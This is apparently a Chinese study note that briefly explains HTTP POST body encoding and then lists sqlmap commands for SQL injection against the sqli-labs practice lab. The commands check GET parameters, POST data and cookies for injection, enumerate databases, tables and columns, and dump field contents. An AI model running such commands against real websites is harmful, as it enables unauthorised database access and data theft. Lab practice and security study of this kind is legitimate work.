HTTP协议规定post提交的数据必须放在消息主体(entity-body)中,但协议没有规定数据必须使用什么编码方式。HTTP协议是以ASCII码传输,建立再TCP/IP协议之上的应用层规范。HTTP请求分为3个部分:状态行、请求头和消息主体。类似于:
服务端通常是根据请求头(header)中的Content_Type字段来获取请求中的消息主体是用何种方式编码,再对消息主体进行解析。
sqlmap常规操作
GET形式
Python sqlmap.py -u “http://–URL地址–/index.PHP?id=1” //注入判断-u:URL地址参数
python sqlmap.py -u “http://192.168.0.141/sqli-labs/Less-1/index.PHP?id=1” --banner //查看数据库版本
Python sqlmap.py -u “http://–URL地址–/index.PHP?id=1” --current-user //当前用户
Python sqlmap.py -u “http://–URL地址–/index.PHP?id=1” --dbs //查看所有的数据库
Python sqlmap.py -u “http://–URL地址–/index.PHP?id=1” --current-db //查看当前的数据库
Python sqlmap.py -u “http://–URL地址–/index.PHP?id=1” --tables //查看所有的表 Python sqlmap.py -u “http://–URL地址–/index.PHP?id=1” --tables -D A //查看A库下的所有表 Python sqlmap.py -u “http://–URL地址–/index.PHP?id=1” --columns -D A -T B //查询A库B表下的所有列 Python sqlmap.py -u “http://–URL地址–/index.PHP?id=1” -C “E,F” -D A -T B //导出字段里的内容
——POST形式——
Python sqlmap.py -u “http://–url–/” --data “uname=123&passwd=123&submit=Submit” //指定页面的POST注入
Python sqlmap.py -r “绝对路径\文件名” --level 3
python sqlmap.py -u “http://192.168.0.141/sqli-labs/Less-20/index.PHP” --cookie=“uname=admin” --level 2 //检测指定cookie字段进行注入
Python sqlmap.py -r “绝对路径\文件名.txt”–level 2 //检测文件内cookie字段进行注入
python sqlmap.py -u “http://192.168.0.141/sqli-labs/Less-20/index.PHP” --cookie=“uname=admin” --dbs --level 2
python sqlmap.py -u “http://192.168.0.141/sqli-labs/Less-1/index.PHP?id=1” --hostname //查看主机名
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。